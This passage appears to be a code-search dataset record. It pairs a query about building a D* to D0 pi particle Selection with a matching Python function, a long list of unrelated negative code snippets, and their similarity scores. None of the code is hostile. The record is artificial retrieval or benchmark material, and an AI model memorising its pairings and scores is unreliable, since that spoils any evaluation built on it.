''),\n\n ('-0000-00-07 00:00:00.00', '1 week ago', ''),\n ('-0000-00-14 00:00:00.00', '2 weeks ago', ''),\n ('-0000-00-21 00:00:00.00', '3 weeks ago', ''),\n\n ('-0000-01-00 00:00:00.00', '1 month ago', ''),\n ('-0000-02-00 00:00:00.00', '2 months ago', ''),\n ('-0000-03-00 00:00:00.00', '3 months ago', ''),\n ('-0000-04-00 00:00:00.00', '4 months ago', ''),\n ('-0000-05-00 00:00:00.00', '5 months ago', ''),\n ('-0000-06-00 00:00:00.00', 'Half a year ago', ''),\n\n ('-0001-00-00 00:00:00.00', '1 year ago', ''),\n ]\n fSelected = False;\n for sTimestamp, sWayBackPointCaption, sExtraAttrs in aoWayBackPoints:\n if sTimestamp == tsEffective:\n fSelected = True;\n sHtmlTimeSelector += ' <option value=\"%s\"%s%s>%s</option>\\n' \\\n % (webutils.quoteUrl(sTimestamp),\n ' selected=\"selected\"' if sTimestamp == tsEffective else '',\n sExtraAttrs, sWayBackPointCaption)\n if not fSelected and tsEffective != '':\n sHtmlTimeSelector += ' <option value=\"%s\" selected>%s</option>\\n' \\\n % (webutils.quoteUrl(tsEffective), tsEffective)\n\n sHtmlTimeSelector += ' </select>\\n';\n sHtmlTimeSelector += sPostamble;\n sHtmlTimeSelector += '\\n</form>\\n'\n\n return sHtmlTimeSelector", "def _select_single(self, disc):\n sqlstmt = \"SELECT h FROM %s WHERE d=?\" % self.VIEW\n pickup = self.cursor.execute(sqlstmt, (disc,))\n picked = pickup.fetchone()\n if picked is not None:\n # picked = (h,)\n return picked[0]\n else:\n raise KeyError(str(disc))", "def Clone(self) -> \"itkIsoDataThresholdCalculatorHDUS_Pointer\":\n return _itkIsoDataThresholdCalculatorPython.itkIsoDataThresholdCalculatorHDUS_Clone(self)", "def __init__(self, id, interval, times=0, q=0, s=0):\n self.id = id\n self.interval = interval\n self.times = times\n self.q = q\n self.s = s", "def start(self):\n return _uhd_swig.meta_range_t_start(self)", "def get_range(g,h,d): # g: graph; h: head node; d: dependent node\n addresses = sorted(g.nodes.keys())\n h_index = addresses.index(h)\n d_index = addresses.index(d)\n sign = cmp(d_index,h_index)\n return addresses[h_index:d_index+sign:sign]", "def from_harte_interval(cls, harte_interval_string):\n if isinstance(harte_interval_string, int):\n harte_interval_string = str(harte_interval_string)\n harte_interval_string = harte_interval_string.strip(' ')\n return cls(find_item(HARTE_INTERVALS, harte_interval_string))", "def from_hff(cls, hff_data, name=None, args=None):\n _assert_or_raise(hff_data, h5py.Group)\n obj = cls(new_obj=False)\n if u'xmin' in hff_data:\n obj.xmin = hff_data[u'xmin'][()]\n if u'xmax' in hff_data:\n obj.xmax = hff_data[u'xmax'][()]\n if u'ymin' in hff_data:\n obj.ymin = hff_data[u'ymin'][()]\n if u'ymax' in hff_data:\n obj.ymax = hff_data[u'ymax'][()]\n if u'zmin' in hff_data:\n obj.zmin = hff_data[u'zmin'][()]\n if u'zmax' in hff_data:\n obj.zmax = hff_data[u'zmax'][()]\n return obj", "def select(self):\n pass", "def select(self):\n pass", "def viewport_selection():\n sel = oMa.MGlobal.getActiveSelectionList()\n\n for i in range(sel.length()):\n m_obj = sel.getDependNode(i)\n yield m_obj", "def get_empty_obj(ch_temp):\n return ChData(None, time_type.TimeType(), ch_temp)", "def Clone(self) -> \"itkIsoDataThresholdCalculatorHDSS_Pointer\":\n return _itkIsoDataThresholdCalculatorPython.itkIsoDataThresholdCalculatorHDSS_Clone(self)", "def h(self, x, u, t):\n \n x, z = self._split_states( x )\n \n y = self.plant.h( x, u, t)\n \n return y", "def _selection ( self, nick ) :\n \n if not self.__selections_.has_key ( self.name() ) :\n self.__selections_[ self.name() ] = {} \n \n return self.__selections_[ self.name() ].get( nick , None )", "def hxlselect():\n run_script(hxlselect_main)", "def convex_hull(self):\n return self._geomgen(capi.geom_convex_hull)", "def New(*args, **kargs):\n obj = itkIsoDataThresholdCalculatorHDUC.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def New(*args, **kargs):\n obj = itkIsoDataThresholdCalculatorHDSS.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def __init__(self):\n self.intervalList = [] # intervalList is a table with \"start\" and \"end\" columns indicating the start and end of each interval", "def select(self):\n\n return self.p[0], self.p[1]", "def makeDstarPartial( name\n , config\n , DecayDescriptor\n , inputSel\n ) :\n\n daugCuts = \"(TRCHI2DOF < %(Daug_TRCHI2DOF_MAX)s)\" % locals()['config']\n combCuts = \"((AM - AM1) < %(Dstar_AMDiff_MAX)s* MeV)\" % locals()['config']\n dstarCuts = \"(VFASPF(VCHI2/VDOF) < %(Dstar_VCHI2VDOF_MAX)s)\" \\\n \"& ((M - M1) < %(Dstar_MDiff_MAX)s* MeV)\" % locals()['config']\n\n _Dstar = CombineParticles( DecayDescriptor = DecayDescriptor\n , DaughtersCuts = { \"pi+\" : daugCuts }\n , CombinationCut = combCuts\n , MotherCut = dstarCuts\n )\n\n return Selection( name+'Sel',\n Algorithm = _Dstar,\n RequiredSelections = inputSel\n )", "def raster_time_select_list(self, selected_field, selected_list_state, selected_list_id, is_readonly, select_list_initial_msg):\n\n raster_time_name_value_dic = {'name': ['2', '4'], 'value': ['2', '4']}\n return make_select_list_using_dictionary(raster_time_name_value_dic, selected_field, selected_list_state, selected_list_id, is_readonly, select_list_initial_msg)", "def makeDstar2D0Pi( name\n , config\n , DecayDescriptor\n , inputSel\n ) :\n\n daugCuts = \"(TRCHI2DOF < %(Daug_TRCHI2DOF_MAX)s)\" % locals()['config']\n combCuts = \"((AM - AM1) < %(Dstar_AMDiff_MAX)s* MeV)\" % locals()['config']\n dstarCuts = \"(VFASPF(VCHI2/VDOF) < %(Dstar_VCHI2VDOF_MAX)s)\" \\\n \"& ((M - M1) < %(Dstar_MDiff_MAX)s* MeV)\" % locals()['config']\n\n _Dstar = CombineParticles( DecayDescriptor = DecayDescriptor\n , DaughtersCuts = { \"pi+\" : daugCuts }\n , CombinationCut = combCuts\n , MotherCut = dstarCuts\n )\n\n return Selection( name+'Sel',\n Algorithm = _Dstar,\n RequiredSelections = inputSel\n )", "def select(self):\r\n pass", "def selectaround(document, selection=None):\n selection = selection or document.selection\n default_chars = ['{', '[', '(', '<', '\\'', '\"']\n candidates = []\n for char in default_chars:\n candidate = selectaround_char(document, char, selection)\n if candidate != None:\n candidates.append(candidate)\n if candidates:\n # Select smallest enclosing candidate\n return min(candidates, key=avg_interval_length)", "def getHourColumn(self): \n return self.hourcol", "def get_selection(self, pointer, answer_sheet, sel_none_of_above):\n def answer_parsing(answer_str):\n selections = answer_str.split(\", \")\n try:\n selections = [int(sel) for sel in selections]\n except:\n return None\n else:\n assert len(selections)\n if sel_none_of_above in selections:\n assert len(selections) == 1 # mutual exclusive \"none of the above\"\n return selections\n\n answer = input(\"Please enter the option id(s) delimited by comma ', ': \")\n selections = answer_parsing(answer)\n while selections is None:\n answer = input(\"Please enter the option id(s) delimited by comma ', ': \")\n selections = answer_parsing(answer)\n\n return selections", "def select(self):\n return", "def get_buffer_selection (buffer):\n bounds = buffer.get_selection_bounds()\n if len(bounds) == 0:\n return \"\"\n else:\n return buffer.get_slice(*bounds)", "def parse_range(option):\n return {\"range\": timedelta(days=option)}", "def horde_init(self, horde_info= {}):", "def get_header_table(self , dt, ds = '' , all_ds = '', length = ''):\n index_low = self.unique_dates[ds]['indices'][dt]['low']\n #index_up = self.unique_dates[best_ds]['indices'][dt]['up'] \n hd = self.data[ds]['header_table'][index_low:index_low+length] \n hd['duplicates'] = all_ds \n \n return hd", "def __getSelectionFilter(self):\n \n selectionPairs = []\n selectionPairs.append(('field','field'))\n selectionPairs.append(('spw','spw'))\n selectionPairs.append(('polarization','correlation'))\n selectionPairs.append(('baseline','antenna'))\n selectionPairs.append(('time','timerange'))\n selectionPairs.append(('scan','scan'))\n selectionPairs.append(('uvdist','uvrange'))\n selectionPairs.append(('scanintent','intent'))\n selectionPairs.append(('observation','observation'))\n return self.__generateFilter(selectionPairs)", "def __chanSelection(self, spwsel):\n \n # Split to get each spw in a list\n if spwsel.__contains__(','):\n spwlist = spwsel.split(',') \n else:\n spwlist = spwsel.split(';')\n \n spwid=[]\n chanlist=[]\n # Split to create two lists, one with channels, the other with spwIDs\n for isel in spwlist:\n # Get tail, colon and head\n (s, c, ch) = isel.rpartition(\":\")\n # Remove any blanks\n s = s.strip(' ')\n c = c.strip(' ')\n ch = ch.strip(' ')\n # If no tail, there was no colon to split. In this case, add the spwID\n if s == \"\":\n spwid.append(ch)\n chanlist.append('')\n else:\n spwid.append(s)\n chanlist.append(ch)\n \n # Create a dictionary\n seldict = {}\n for ns in xrange(len(spwid)):\n sel = {}\n sel['spw'] = spwid[ns]\n sel['channels'] = chanlist[ns]\n seldict[ns] = sel\n\n\n return seldict", "def __init__(self, time=0, uni=None, dmx=None):\n self.time = time\n self.dmx = {}\n if uni and dmx:\n self.dmx[uni] = dmx", "def add_hic_interval_subparser(subparsers):\n parser = subparsers.add_parser(\"hic-interval\",\n help=\"HiFive Binning Function: Create a tabular interaction file containing data from a HiFive HiC project. Data are a genomic-interval format (chr1 start1 stop1 chr2 start2 stop2).\")\n parser.add_argument(\"-c\", \"--chromosome\", dest=\"chrom\", default=None, required=True, type=str,\n help=\"The chromosome from which to pull interaction data from.\")\n parser.add_argument(\"--chromosome2\", dest=\"chrom2\", default=None, required=False, type=str,\n help=\"The second chromosome from which to pull interaction data from if pulling trans data.\")\n parser.add_argument(\"-s\", \"--start\", dest=\"start\", default=None, required=False, type=int,\n help=\"The start coordinate of the pulled region to return. (None indicates the first valid bin on the chromosome) [default %(default)s]\")\n parser.add_argument(\"-e\", \"--stop\", dest=\"stop\", default=None, required=False, type=int,\n help=\"The stop coordinate of the pulled region to return. (None indicates the last valid bin on the chromosome) [default %(default)s]\")\n parser.add_argument(\"--start2\", dest=\"start2\", default=None, required=False, type=int,\n help=\"The start coordinate of the second chromosome pulled region to return. (None indicates the first valid bin on the chromosome) [default %(default)s]\")\n parser.add_argument(\"--stop2\", dest=\"stop2\", default=None, required=False, type=int,\n help=\"The stop coordinate of the second chromosome pulled region to return. (None indicates the last valid bin on the chromosome) [default %(default)s]\")\n parser.add_argument(\"-b\", \"--binsize\", dest=\"binsize\", default=10000, type=int,\n help=\"The size of bins, in base pairs, to group data into. [default: %(default)s]\")\n parser.add_argument(\"-m\", \"--max-distance\", dest=\"maxdist\", default=None, type=int,\n help=\"The maximum interaction distance to return (None indicates no maximum). [default: %(default)s]\")\n parser.add_argument(\"-d\", \"--data-type\", dest=\"datatype\", default=\"fend\",\n help=\"Which corrections (if any) to apply to counts. [default: %(default)s]\",\n choices=[\"raw\", \"fend\", \"distance\", \"enrichment\", \"expected\"])\n parser.add_argument(\"-M\", \"--matrix\", dest=\"matrix\", default=False, action=\"store_true\",\n help=\"Store output as a tab-separated matrix of values.\")\n parser.add_argument(\"-y\", \"--dynamically-bin\", dest=\"dynamic\", default=False, action=\"store_true\",\n help=\"Dynamically bin heatmap.\")\n parser.add_argument(\"-x\", \"--expansion-binsize\", dest=\"expbinsize\", default=10000, type=int,\n help=\"The size of bins, in base pairs, to group data into for expanding under-populated bins. [default: %(default)s]\")\n parser.add_argument(\"-f\", \"--minobservations\", dest=\"minobs\", default=20, type=int,\n help=\"The minimum number of observed reads in a bin for it to be considered valid. [default: %(default)s]\")\n parser.add_argument(\"-a\", \"--search-distance\", dest=\"search\", default=0, type=int,\n help=\"The furthest distance from the bin minpoint to expand bounds. If set to zero, there is no limit on expansion distance. [default: %(default)s]\")\n parser.add_argument(\"-v\", \"--remove-failed\", dest=\"remove\", default=False, action=\"store_true\",\n help=\"If a non-zero 'search-distance' is given, it is possible for a bin not to meet the 'minobservations' criteria before stopping looking. If this occurs and 'remove-failed' is set, the observed and expected values for that bin are zero.\")\n parser.add_argument(\"-i\", \"--image-file\", dest=\"image\", default=None, type=str,\n help=\"Save the data as an image to this file.\")\n parser.add_argument(\"-p\", \"--pdf\", dest=\"pdf\", default=False, action=\"store_true\",\n help=\"Format the image in PDF format. [default: %(default)s]\")\n parser.add_argument(\"-r\", \"--rotate\", dest=\"rotate\", default=False, action=\"store_true\",\n help=\"Rotate the plot 45 degrees (cis binned only). [default: %(default)s]\")\n parser.add_argument(\"-t\", \"--ticks\", dest=\"ticks\", default=False, action=\"store_true\",\n help=\"Add tick marks and labels to the plot (pdf format and binned only). [default: %(default)s]\")\n parser.add_argument(\"-l\", \"--legend\", dest=\"legend\", default=False, action=\"store_true\",\n help=\"Add color scale to the plot (pdf format only). [default: %(default)s]\")\n parser.add_argument(\"-k\", \"--keyword\", dest=\"keywords\", default=[], type=str, action='append',\n help=\"Additional keyword arguments to pass to plotting function.\")\n add_silent_argument(parser)\n parser.add_argument(dest=\"project\", type=str,\n help=\"The name of a HiFive HiC project file to pull data from.\")\n parser.add_argument(dest=\"output\", type=str,\n help=\"The name of the file to write HiC interval to.\")\n return", "def create_ham(self):\n from tcc.interaction import HAM_SPINLESS_RI_CORE\n return HAM_SPINLESS_RI_CORE(self)", "def create_ham(self):\n from tcc.interaction import HAM_SPINLESS_RI_CORE\n return HAM_SPINLESS_RI_CORE(self)", "def generate_access_time_plot_from_range(id_range, val):\n segments = []\n points = []\n\n for i in id_range:\n if isinstance(i, list):\n endpoints = [(i[0], val), (i[1], val)]\n segments.append(endpoints)\n else:\n points.append((i, val))\n return segments, points", "def selective(G, H):\n left_1 = {selective(G_L, H) for G_L in G._left}\n left_2 = {selective(G, H_L) for H_L in H._left}\n left_3 = {selective(G_L, H_L) for G_L in G._left for H_L in H._left}\n right_1 = {selective(G_R, H) for G_R in G._right}\n right_2 = {selective(G, H_R) for H_R in H._right}\n right_3 = {selective(G_R, H_R) for G_R in G._right for H_R in H._right}\n return Game(left_1 | left_2 | left_3, right_1 | right_2 | right_3)", "def select(self, gas=range(1, 12), loc=range(1, 7),\n voltage=range(1, 6), speed=range(1, 4), trial=range(1, 21),\n from_HDFcache=False):\n # cast int entries to list\n if isinstance(gas, int):\n gas = [gas]\n if isinstance(loc, int):\n loc = [loc]\n if isinstance(voltage, int):\n voltage = [voltage]\n if isinstance(speed, int):\n speed = [speed]\n if isinstance(trial, int):\n trial = [trial]\n\n # validate input\n assert min(gas) > 0 and max(gas) in self.GasNames.keys(), \\\n 'Wrong gas name: {}'.format(gas)\n assert min(loc) > 0 and max(loc) in self.Locs.keys(), \\\n 'Wrong board location: {}'.format(loc)\n assert min(voltage) > 0 and max(voltage) in self.SensorVoltages.keys(), \\\n 'Wrong sensor voltage: {}'.format(voltage)\n assert min(speed) > 0 and max(speed) in self.FanSpeeds.keys(), \\\n 'Wrong fan speed: {}'.format(speed)\n assert min(trial) > 0 and max(trial) in range(1, 21), \\\n 'Trial number out of range, must be [1,20], is [{},{}]'.format(\n min(trial), max(trial))\n\n cols = self._get_data(gas, loc, voltage, speed, trial)\n return cols", "def __init__(self):\n \n # Call the super contructor\n super(Select, self).__init__(0, 0, 200, 50)\n\n # Assign personalisation attributes\n self.placeholder = \"Choose a value\"\n self.font_name: str = None\n self.font_size: int = 12\n\n self.bg_color: tuple = (0, 0, 0, 0)\n self.bg_hover: tuple = (255, 255, 255, 30)\n self.bg_press: tuple = None\n\n self.label_color: tuple = (255, 255, 255, 255)\n self.label_hover: tuple = None\n self.label_press: tuple = None\n\n self.border_color: tuple = (255, 255, 255, 255)\n self.border_hover: tuple = None\n self.border_press: tuple = None\n self.border_width: int = 4\n\n self.option_height: int = 45\n self.option_margin: int = 5\n self.option_font_name = None\n self.option_font_size = 12\n\n self.option_bg_color: tuple = (0, 0, 0, 0)\n self.option_bg_hover: tuple = (255, 255, 255, 30)\n self.option_bg_press: tuple = None\n self.option_bg_select: tuple = (255, 255, 255, 60)\n\n self.option_label_color: tuple = (255, 255, 255, 255)\n self.option_label_hover: tuple = None\n self.option_label_press: tuple = None\n self.option_label_select: tuple = None\n\n # Assign internal attributes\n self._is_hovered: bool = False\n self._is_pressed: bool = False\n self._is_opened: bool = False\n self._is_inverted: bool = False\n self._options: list = list()\n self._current_select: int = -1\n self._current_hover: int = -1\n\n self._bg = pyglet.shapes.Rectangle\n self._label = pyglet.text.Label\n self._border = Border\n\n self._option_border: Border = None\n self._options_bg: list = list()\n self._options_label: list = list()", "def __init__(self, hgtStartData):\r\n self.data = []\r\n for row in hgtStartData:\r\n toAdd = []\r\n for height in row:\r\n toAdd.append([height, 0])\r\n self.data.append(toAdd)\r\n self.maxX = len(hgtStartData[0]) - 1\r\n self.maxY = len(hgtStartData) - 1\r\n\r\n self.minFloodHeight = 0", "def create_interval_hsb(confidence, n_samples, data_point):\n if n_samples == 0:\n return Interval(0, 1)\n delta = margin_hsb(confidence, n_samples, data_point)\n return Interval(float(max(data_point - delta, 0)), float(min(data_point + delta, 1)))", "def element(selection, sel_type='id'):\n selector = get_selector_method(sel_type)\n return selector(selection)" ]
[ "0.5978266", "0.5615562", "0.53860027", "0.53363514", "0.52604216", "0.5230591", "0.5123659", "0.5109732", "0.5086925", "0.50513536", "0.50479877", "0.5033334", "0.49208", "0.49170148", "0.4872133", "0.4828051", "0.48176673", "0.47932035", "0.4729161", "0.4611828", "0.4548788", "0.45258135", "0.45256746", "0.4518496", "0.45113194", "0.45038095", "0.44976357", "0.4467496", "0.4460264", "0.4458065", "0.445146", "0.44489405", "0.44391263", "0.4399108", "0.43989527", "0.43842357", "0.42949075", "0.42814448", "0.4278862", "0.4273409", "0.42652312", "0.42446917", "0.4239347", "0.42383683", "0.42346287", "0.42314786", "0.42274785", "0.42203844", "0.420049", "0.41954997", "0.41747656", "0.4171289", "0.41667187", "0.41656277", "0.41603115", "0.41472495", "0.41453823", "0.41398874", "0.4138515", "0.41288197", "0.41205293", "0.41195765", "0.41177705", "0.41177705", "0.41170934", "0.41142002", "0.41080582", "0.41022882", "0.40951672", "0.40948918", "0.408553", "0.40842402", "0.4082453", "0.40815133", "0.4077606", "0.40774184", "0.40744117", "0.40719038", "0.40692466", "0.40666434", "0.40657264", "0.40646943", "0.4057667", "0.40538895", "0.4043869", "0.40420336", "0.40403202", "0.4028882", "0.4015297", "0.40142134", "0.40113807", "0.40112755", "0.40112755", "0.40041262", "0.40039748", "0.4002402", "0.40021467", "0.39998695", "0.39994878", "0.39925647" ]
0.40723988
77
Create and return a D > D0 pi Selection object.
def makeDstar2D0Pi( name , config , DecayDescriptor , inputSel ) : daugCuts = "(TRCHI2DOF < %(Daug_TRCHI2DOF_MAX)s)" % locals()['config'] combCuts = "((AM - AM1) < %(Dstar_AMDiff_MAX)s* MeV)" % locals()['config'] dstarCuts = "(VFASPF(VCHI2/VDOF) < %(Dstar_VCHI2VDOF_MAX)s)" \ "& ((M - M1) < %(Dstar_MDiff_MAX)s* MeV)" % locals()['config'] _Dstar = CombineParticles( DecayDescriptor = DecayDescriptor , DaughtersCuts = { "pi+" : daugCuts } , CombinationCut = combCuts , MotherCut = dstarCuts ) return Selection( name+'Sel', Algorithm = _Dstar, RequiredSelections = inputSel )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_selection ( self ,\n tag , \n algotype ,\n inputs , \n *args ,\n **kwargs ) :\n sel_tag = '%s_Selection' % tag\n sel_name = 'Sel%sFor%s' % ( tag , self.name() )\n #\n ## check existing selection\n #\n sel = self._selection ( sel_tag )\n if sel : return sel \n\n #\n ## adjust a bit the arguments\n if not kwargs.has_key('Preambulo') :\n kwargs ['Preambulo' ] = self['Preambulo']\n\n if not kwargs.has_key( 'ParticleCombiners' ) :\n kwargs ['ParticleCombiners'] = { '' : 'LoKi::VertexFitter:PUBLIC' } \n \n # \n ## use \"simple-selection\"\n #\n from PhysSelPython.Wrappers import SimpleSelection\n sel = SimpleSelection (\n sel_name ,\n algotype ,\n inputs , \n *args ,\n **kwargs )\n # \n return self._add_selection( sel_tag , sel )", "def from_selection(cls):\n guid = compas_rhino.select_point()\n return cls.from_guid(guid)", "def create(cls, selection):\n\t\t\n\t\treturn cls({ true_selector: selection, false_selector: Selection.invert(selection) })", "def from_selection(\n class_,\n selection,\n item_class=None,\n ):\n import abjad\n pitch_segment = abjad.PitchSegment.from_selection(selection)\n return class_(\n pitch_segment,\n item_class=item_class,\n )", "def makeDefault(name,inputSel) :\n from Configurables import OfflineVertexFitter\n Detached4mu = CombineParticles(\"Combine\"+name)\n Detached4mu.DecayDescriptor = \"B_s0 -> mu+ mu- mu+ mu-\"\n # Set the OfflineVertexFitter to keep the 4 tracks and not the J/Psi Kstar:\n Detached4mu.addTool( OfflineVertexFitter )\n Detached4mu.ParticleCombiners.update( { \"\" : \"OfflineVertexFitter\"} )\n Detached4mu.OfflineVertexFitter.useResonanceVertex = False\n Detached4mu.ReFitPVs = True\n Detached4mu.DaughtersCuts = { \"mu+\" : \"(TRCHI2DOF < 2.5 ) \"\\\n \" & (MIPCHI2DV(PRIMARY)> 9.)\"}\n \n Detached4mu.CombinationCut = \"(ADAMASS('B_s0')<1000*MeV) \"\\\n \"& (AMAXDOCA('')<0.3*mm)\"\n Detached4mu.MotherCut = \"(VFASPF(VCHI2/VDOF)<9) \"\\\n \"& (BPVDIRA > 0) \"\\\n \"& (BPVVDCHI2>100)\"\\\n \" & (M>4366.3) & (M<6366.3)\"\\\n \"& (BPVIPCHI2()< 25) \"\n \n\n return Selection (name,\n Algorithm = Detached4mu,\n RequiredSelections = inputSel)", "def make_odorant_selector(name):\n return dcc.Input(\n id=\"cid_%s\" % name,\n placeholder=\"Enter a PubChem ID number...\",\n type=\"number\",\n value=None,\n )", "def makePseudoPsi( name\n , config\n , DecayDescriptor\n , inputSel\n ) :\n\n _daugCuts = \"(PT> %(D0PtLoose)s*MeV)\" % locals()['config']\n _combCuts = \"(APT> %(D0PtLoose)s*MeV)\" % locals()['config']\n\n _Psi = CombineParticles( DecayDescriptor = DecayDescriptor\n , DaughtersCuts = { \"D0\": _daugCuts }\n , CombinationCut = _combCuts\n , MotherCut = \"(VFASPF(VCHI2PDOF) < 10000)\"\n )\n\n return Selection( name+'Sel',\n Algorithm = _Psi,\n RequiredSelections = inputSel\n )", "def createSelector(self,type='select',speed=2.0):\n self.selector = self.loadObject(type, scale=2, parent=render, transparency=True, pos=Point2(0,0), glow=1)\n self.selector.hide()\n ival = self.selector.hprInterval((speed), Vec3(0, 0, 360))\n ival.loop()", "def __init__(self,initial_v,v_select=0,max_dev_semitones=1):\n self.v=initial_v\n self.v_select=v_select\n self.max_dev_semitones=max_dev_semitones", "def __init__(self):\n super().__init__()\n self.p = 0.0\n self.type = 'Geometric'\n self.distType = 'Discrete'\n self.lowerBound = 0.0\n self.upperBound = 1.0\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def __init__(self, pvID, pvP, pvQ, pvDescriptor):\n\n # TODO: implement this", "def makeDstarPartial( name\n , config\n , DecayDescriptor\n , inputSel\n ) :\n\n daugCuts = \"(TRCHI2DOF < %(Daug_TRCHI2DOF_MAX)s)\" % locals()['config']\n combCuts = \"((AM - AM1) < %(Dstar_AMDiff_MAX)s* MeV)\" % locals()['config']\n dstarCuts = \"(VFASPF(VCHI2/VDOF) < %(Dstar_VCHI2VDOF_MAX)s)\" \\\n \"& ((M - M1) < %(Dstar_MDiff_MAX)s* MeV)\" % locals()['config']\n\n _Dstar = CombineParticles( DecayDescriptor = DecayDescriptor\n , DaughtersCuts = { \"pi+\" : daugCuts }\n , CombinationCut = combCuts\n , MotherCut = dstarCuts\n )\n\n return Selection( name+'Sel',\n Algorithm = _Dstar,\n RequiredSelections = inputSel\n )", "def from_selection(cls):\n guid = compas_rhino.select_mesh()\n return cls.from_guid(guid)", "def createSelector2(self,type='select',speed=2.0):\n self.selector2 = self.loadObject(type, scale=2, parent=render, transparency=True, pos=Point2(0,0), glow=1)\n self.selector2.hide()\n ival = self.selector2.hprInterval((speed), Vec3(0, 0, 360))\n ival.loop()", "def __init__(self):\n super().__init__()\n self.p = 0.0\n self.type = 'Bernoulli'\n self.distType = 'Discrete'\n self.lowerBound = 0.0\n self.upperBound = 1.0\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def __init__(self, P, I, D, dt):\n\n\t\tself._Kp = P\n\t\tself._Ki = I\n\t\tself._Kd = D\n\t\tself._dt = dt", "def curve_through_selection(*args):\n sel = cmds.ls(sl=True, fl=True)\n if not sel or len(sel)==1:\n cmds.warning(\"You need to select multiple things to create curve through!\")\n return()\n\n pList = []\n crvType = cmds.radioButtonGrp(widgets[\"crvSelRBG\"], q=True, sl=True)\n\n for obj in sel:\n if cmds.objectType(obj) in [\"transform\"]:\n pos = cmds.xform(obj, q=True, ws=True, rp=True)\n pList.append(pos)\n elif obj in cmds.filterExpand(sm=[28, 30, 31, 32, 34, 46]):\n pos = cmds.pointPosition(obj)\n pList.append(pos)\n\n #add points if only 2 (cv, ep) or 3 (cv) are given, and create the curve\n if crvType == 1:\n if len(pList) == 2:\n f = [float(sum(x)/2) for x in zip(*pList)]\n pList.insert(1, f)\n vec1 = [pList[1][0]-pList[0][0], pList[1][1]-pList[0][1], pList[1][2]-pList[0][2]]\n newPt1 =[pList[0][0] + (vec1[0]*0.05), pList[0][1] + (vec1[1]*0.05), pList[0][2] + (vec1[2]*0.05)]\n vec2 = [pList[1][0] - pList[2][0], pList[1][1] - pList[2][1], pList[1][2] - pList[2][2]]\n newPt2= [pList[2][0] + (vec2[0]*0.05), pList[2][1] + (vec2[1]*0.05), pList[2][2] + (vec2[2]*0.05)]\n pList.insert(1, newPt1)\n pList.insert(3, newPt2)\n if len(pList) == 3:\n vec1 = [pList[1][0]-pList[0][0], pList[1][1]-pList[0][1], pList[1][2]-pList[0][2]]\n newPt1 =[pList[0][0] + (vec1[0]*0.05), pList[0][1] + (vec1[1]*0.05), pList[0][2] + (vec1[2]*0.05)]\n vec2 = [pList[1][0] - pList[2][0], pList[1][1] - pList[2][1], pList[1][2] - pList[2][2]]\n newPt2= [pList[2][0] + (vec2[0]*0.05), pList[2][1] + (vec2[1]*0.05), pList[2][2] + (vec2[2]*0.05)]\n pList.insert(1, newPt1)\n pList.insert(3, newPt2)\n crv = cmds.curve(d=3, p=pList, name=\"newCurve\")\n\n if crvType == 2:\n if len(pList) == 2:\n f = [float(sum(x)/2) for x in zip(*pList)]\n pList.insert(1, f)\n crv = cmds.curve(d=3, ep=pList, name=\"newCurve\")\n\n return(crv)", "def __init__(\n self, name: str, values: List[Dict], index: Optional[int] = 0,\n label: Optional[str] = None, help: Optional[str] = None,\n default: Optional[bool] = None, required: Optional[bool] = False,\n group: Optional[str] = None\n ):\n super(Select, self).__init__(\n dtype=PARA_SELECT,\n name=name,\n index=index,\n label=label,\n help=help,\n default=default,\n required=required,\n group=group\n )\n self.values = values", "def build_selection_spec(client_factory, name):\r\n sel_spec = client_factory.create('ns0:SelectionSpec')\r\n sel_spec.name = name\r\n return sel_spec", "def __init__(self):\n super().__init__()\n self.n = 0.0\n self.p = 0.0\n self.type = 'Binomial'\n self.hasInfiniteBound = True\n self.distType = 'Discrete'\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def pdos_select(self, atoms=None, spin=None, l=None, m=None):\n valid_m_values = {'s': [],\n 'p': ['x', 'y', 'z'],\n 'd': ['xy', 'yz', 'z2-r2', 'xz', 'x2-y2'],\n 'f': ['y(3x2-y2)', 'xyz', 'yz2', 'z3', 'xz2', 'z(x2-y2)', 'x(x2-3y2)']}\n if not atoms:\n atom_idx = list(range(self.number_of_atoms))\n else:\n atom_idx = atoms\n to_return = self.pdos_raw[atom_idx, :, :, :]\n if not spin:\n spin_idx = list(range(self.ispin))\n elif spin == 'up':\n spin_idx = [0]\n elif spin == 'down':\n spin_idx = [1]\n elif spin == 'both':\n spin_idx = [0, 1]\n else:\n raise ValueError\n to_return = to_return[:, :, :, spin_idx]\n\n if not l:\n channel_idx = list(range(self.number_of_channels))\n elif l == 's':\n channel_idx = [0]\n elif l == 'p':\n if not m:\n channel_idx = [1, 2, 3]\n else:\n channel_idx = [1 + i for i, v in enumerate(valid_m_values['p']) if v in m]\n elif l == 'd':\n if not m:\n channel_idx = [4, 5, 6, 7, 8]\n else:\n channel_idx = [4 + i for i, v in enumerate(valid_m_values['d']) if v in m]\n elif l == 'f':\n if not m:\n channel_idx = [9, 10, 11, 12, 13, 14, 15]\n else:\n channel_idx = [9 + i for i, v in enumerate(valid_m_values['f']) if v in m]\n else:\n raise ValueError\n\n return to_return[:, :, channel_idx, :]", "def select(self):\n\t\tbest_num_components = self.n_constant\n\t\treturn self.base_model(best_num_components)", "def __init__(self, parent):\n # parent is the main frame of PyCorrFit\n self.parent = parent\n ## MYID\n # This ID is given by the parent for an instance of this class\n self.MyID = None\n ## Wrapping\n curvedict, labels = self.GetCurvedict()\n self.labels = labels\n self.Selector = UserSelectCurves(parent, curvedict,\n wrapper=self, labels=labels)\n # This is necessary for parent to deselect and select the tool\n # in the tools menu.\n self.Bind = self.Selector.Bind\n if self.parent.notebook.GetPageCount() == 0:\n self.Selector.sp.Disable()", "def __init__(self, p) -> None:\n self._p = p\n self._delegate = TwoQubitAsymmetricDepolarizingChannel(p / 15, p / 15, p / 15,\n p / 15, p / 15, p / 15,\n p / 15, p / 15, p / 15,\n p / 15, p / 15, p / 15,\n p / 15, p / 15, p / 15)", "def _an_element_(self):\n from sage.rings.integer_ring import ZZ\n return self(self.realization_of().PD().get_point(ZZ.zero()))", "def 选择项目(self, n): # real signature unknown; restored from __doc__\n return self.Select(n)", "def 